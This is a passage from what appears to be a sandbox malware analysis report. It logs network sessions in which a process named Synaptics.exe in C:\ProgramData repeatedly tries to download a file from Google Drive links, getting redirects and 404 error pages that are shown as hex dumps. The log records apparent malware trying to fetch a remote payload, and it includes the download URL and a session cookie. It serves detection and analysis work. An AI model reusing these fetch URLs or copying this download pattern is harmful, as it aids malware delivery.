                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-yH-Ss2849tMJ2ye23x4UlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:47 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:47 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 34 46 36 77 6e 69 4e 41 62 6d 4a 47 2d 41 6f 57 61 69 38 33 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="p4F6wniNAbmJG-AoWai83g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:47 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      33192.168.2.649863142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:47 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:47 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6ECm1TxO9_Y_R_zeUMUtx_dEWqKdl9Je9KGTkZKb23w7txD3jRMlS8buy3OaPFGUep
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:47 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-_YhG6DZjERxiMrIanbQBxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:47 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:47 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 72 56 78 31 77 56 50 5f 47 6e 6f 31 61 2d 51 62 76 31 6b 30 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="XrVx1wVP_Gno1a-Qbv1k0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:47 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      34192.168.2.649870142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:48 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:48 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YtL-f38TYat2C0OSNXcuAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      35192.168.2.649871142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:48 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:48 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-v5C1F-j27OB6j5Hpj-yTXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      36192.168.2.649872142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:48 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:48 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC7zw3Cy7V4RUsdhBpaaYUUlA79ahimYQjFgdyjqeOjvHujYtRsMsaegWWjQKB3nxsyM
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:48 GMT
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-D1nQFe1mu63h61C2NEWQ-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:48 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:48 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 6a 7a 73 49 51 55 4a 77 79 75 33 70 52 47 6c 43 63 48 37 6a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="7jzsIQUJwyu3pRGlCcH7jg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:48 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      37192.168.2.649874142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:48 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:49 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6Jhg2hCTUy3ese7-BAkYlQQmrcsKh-dT0_DMpkMJdyOSIav5yCzWAVV_z9377v5xnH3iUpesU
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:49 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-QnELD4iSBQ4z4wHvxTmLhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:49 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:49 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 6e 4e 56 58 68 58 54 73 4e 58 4f 5f 31 6d 34 52 78 71 49 5a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="0nNVXhXTsNXO_1m4RxqIZg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:49 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      38192.168.2.649880142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:49 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      39192.168.2.649881142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:49 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      40192.168.2.649883142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:49 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      41192.168.2.649893142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:50 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:50 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-UhRKi85XObJKww2x_M-Jig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
